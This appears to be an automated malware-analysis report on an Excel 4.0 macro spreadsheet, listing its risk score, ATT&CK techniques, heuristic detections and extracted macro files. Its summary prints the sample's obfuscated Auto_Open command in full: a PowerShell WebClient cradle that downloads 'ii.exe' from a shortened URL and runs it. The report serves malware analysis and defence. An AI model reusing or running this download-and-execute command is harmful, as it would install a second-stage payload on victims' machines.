MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
T1566.002 Spearphishing Attachment
The sample is an Excel 4.0 macro-enabled spreadsheet that contains an Auto_Open macro. This macro executes a PowerShell command that downloads a file named 'ii.exe' from the URL https://tinyurl.com/y6m5spjf and then executes it. The XLM macro explicitly constructs the command: 'c' & 'md' & ' /c' & ' powershell' & ' -w 1 (nEw-oB`jecT Net.WebcL`IENt).(\'Down\'+\'loadFile\').In' & 'v' & 'oke(\'https://tinyurl.com/y6m5spjf\',\'ii.exe\')'. This indicates the intent is to download and execute a second-stage payload.
Heuristics 4
-
ClamAV: Xls.Malware.Abracadabra-10031695-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Abracadabra-10031695-0
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txtf3eac7d7dc642ae8c99a4e36ee8d62f28077e137ee995510e98cf7613c6ddf19 |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 1917 bytes |
macros.bas953bf125fb95a97d67f1dfae6bad54545952dd76d888d2a1cbcc94e4187e5630 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1065 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.